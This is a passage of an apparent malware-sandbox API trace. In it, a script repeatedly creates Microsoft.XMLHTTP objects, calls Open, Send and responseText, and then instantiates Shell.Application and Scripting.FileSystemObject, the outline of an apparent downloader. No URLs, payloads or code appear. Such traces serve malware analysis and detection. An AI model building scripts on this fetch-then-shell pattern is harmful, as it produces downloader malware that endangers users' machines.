	[0533.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.779] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0533.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0533.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0533.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.779] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.779] longjmp () 
	[0533.780] longjmp () 
	[0533.780] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.780] SysStringLen (param_1=0x0) returned 0x0
	[0533.780] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0533.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0533.780] ??2@YAPEAX_K@Z () returned 0x62f330
	[0533.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0533.780] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.780] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0533.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0533.780] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0533.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.781] longjmp () 
	[0533.781] longjmp () 
	[0533.781] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0533.781] SysStringLen (param_1=0x0) returned 0x0
	[0533.781] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0533.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0533.782] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0533.782] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0533.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0533.782] ??2@YAPEAX_K@Z () returned 0x62f310
	[0533.782] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0533.782] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0533.782] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0533.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0533.782] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0533.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0533.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0533.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0533.783] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0533.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0534.742] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0534.742] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0534.742] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0534.742] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0534.742] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0534.742] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0534.742] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0534.742] SysStringLen (param_1=0x0) returned 0x0
	[0534.742] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0534.742] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0534.743] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0534.743] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0534.743] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0534.743] ??2@YAPEAX_K@Z () returned 0x62f350
	[0534.743] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0534.743] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0534.743] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0534.743] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0534.743] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0534.743] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0534.743] SysStringLen (param_1=0x0) returned 0x0
	[0534.743] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0534.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0534.746] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0534.746] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0534.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0534.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0534.746] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0536.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0536.203] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0536.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0536.204] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.204] SysStringLen (param_1=0x0) returned 0x0
	[0536.204] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.204] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0536.204] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0536.205] ??2@YAPEAX_K@Z () returned 0x62f310
	[0536.205] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0536.205] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0536.205] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0536.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0536.205] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0536.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0536.205] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0536.207] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0536.208] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0536.208] SysStringLen (param_1=0x0) returned 0x0
	[0536.208] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0536.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0536.208] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0536.208] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0536.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0536.208] ??2@YAPEAX_K@Z () returned 0x62f330
	[0536.208] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
